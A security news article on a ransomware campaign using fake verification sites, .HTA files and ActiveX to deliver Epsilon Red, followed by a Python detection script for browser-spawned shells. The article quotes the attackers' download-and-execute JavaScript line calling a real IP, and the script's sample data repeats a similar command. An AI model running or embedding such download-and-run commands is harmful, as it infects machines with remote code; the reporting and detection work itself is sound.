Security researchers at CloudSEK have uncovered a sophisticated malware delivery campaign using Clickfix-themed websites to distribute Epsilon Red ransomware, marking a dangerous evolution in social engineering tactics.
The campaign leverages malicious .HTA files and ActiveX objects that can silently execute shell commands, bypassing traditional security measures while impersonating popular online services to deceive victims.
Advanced Execution Method Exploits Browser Vulnerabilities
Unlike conventional Clickfix campaigns that copy malicious commands to clipboards, this variant employs a more direct approach by urging victims to visit a secondary page where JavaScript code creates an ActiveXObject to execute Windows shell commands.

The malicious script runs var shell = new ActiveXObject("WScript.Shell"); to establish command-line access, then silently downloads and executes the ransomware payload using the command: shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe", 0);.
The attack concludes with a sophisticated social engineering element, displaying a fake verification message that reads “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” – a deliberately misspelled prompt designed to appear non-threatening while maintaining the illusion of legitimate verification.
The intentional typo in “Verificatification” is meant to lower victims’ suspicion by appearing amateurish rather than malicious.
Widespread Infrastructure Targeting Popular Platforms
CloudSEK’s investigation revealed that threat actors are operating an extensive infrastructure network, impersonating widely used services, including Discord Captcha Bot, Kick, Twitch, Rumble, and OnlyFans, to maximize their reach.
The researchers also discovered romance-themed and dating-focused Clickfix delivery pages operated by the same cybercriminal group, indicating a diversified approach to victim targeting.
Epsilon Red ransomware, first identified in 2021, bears stylistic similarities to the notorious REvil ransomware in its ransom note formatting.
However, security experts note that beyond aesthetic resemblance, the two ransomware families appear operationally distinct.
The malware sample (MD5: 98107c01ecd8b7802582d404e007e493) demonstrates the group’s continued evolution and adaptation of their attack methods.
The campaign’s impact extends beyond individual infections, as the abuse of ActiveXObject enables remote code execution directly from browser sessions, effectively bypassing traditional download protections.
Security experts recommend disabling ActiveX and Windows Script Host through Group Policy, implementing threat intelligence feeds to block known malicious IP addresses, and deploying endpoint detection rules to identify suspicious browser-spawned processes.
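The last recommendation, detecting browser-spawned processes, can be turned into a concrete rule. The script below is an added illustration, not code from CloudSEK or from the article: it scores process-creation events for the chain this campaign produces (a browser or mshta.exe host spawning cmd.exe, which runs curl against a bare IP address and then executes the file it just downloaded). The field names (ParentImage, Image, CommandLine) follow the common Sysmon Event ID 1 layout, which is an assumption about the telemetry source; the sample events, the 203.0.113.10 address and the file name are constructed for the example.

```python
"""Score process-creation events for the browser -> shell -> curl -> run chain.

Added example, not from the article. Event layout is assumed to be
Sysmon-like (ParentImage, Image, CommandLine); sample events are constructed.
"""
import re

# Hosts that should not normally be spawning command shells.
BROWSER_LIKE_PARENTS = {
    "chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe",
    "mshta.exe", "wscript.exe", "cscript.exe",
}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "curl", "certutil.exe", "bitsadmin.exe"}

# http(s)://<bare IPv4>[:port]/... anywhere in the command line.
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S*", re.I)
# "-o <file>.exe" (download target) and "&& <file>.exe" (execution).
EXE_DROP = re.compile(r"-o\s+(\S+\.exe)\b", re.I)
EXE_RUN = re.compile(r"&&\s*(\S+\.exe)\b", re.I)


def basename(path):
    """Lower-cased final path component, tolerating / and \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in BROWSER_LIKE_PARENTS and image in SHELL_CHILDREN:
        reasons.append(f"shell {image} spawned by {parent}")
    tokens = {basename(t) for t in cmd.split()}
    if tokens & DOWNLOADERS:
        reasons.append("command line invokes a downloader")
    if IP_URL.search(cmd):
        reasons.append("download from a bare IP address")
    drop, run = EXE_DROP.search(cmd), EXE_RUN.search(cmd)
    if drop and run and basename(drop.group(1)) == basename(run.group(1)):
        reasons.append("downloaded executable is run in the same command")
    return len(reasons), reasons


def detect(events, threshold=3):
    """Return [(event, reasons)] for events scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry (assumed Sysmon-like field names).
SAMPLE_EVENTS = [
    {   # campaign-style chain: browser -> cmd -> curl from bare IP -> run drop
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd /c cd /D C:\Users\victim && curl -s -o a.exe "
                       r"http://203.0.113.10:8080/dw/sample.exe && a.exe",
    },
    {   # benign: user shell from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c dir",
    },
    {   # suspicious parent only, nothing else
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c echo hello",
    },
    {   # admin script fetching JSON over HTTPS from a hostname
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": "curl -s -o report.json https://api.example.com/v1/report",
    },
]

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT {basename(ev['Image'])}: " + "; ".join(reasons))
```

Only the first event reaches the alert threshold (all four indicators); a browser-spawned shell on its own scores one, which is worth recording but not paging on. The threshold and the parent list are the tuning knobs: adding mshta.exe, wscript.exe and cscript.exe to the parent set covers the .HTA delivery the article describes, and the same indicators can be expressed in a SIEM query once the field names are mapped.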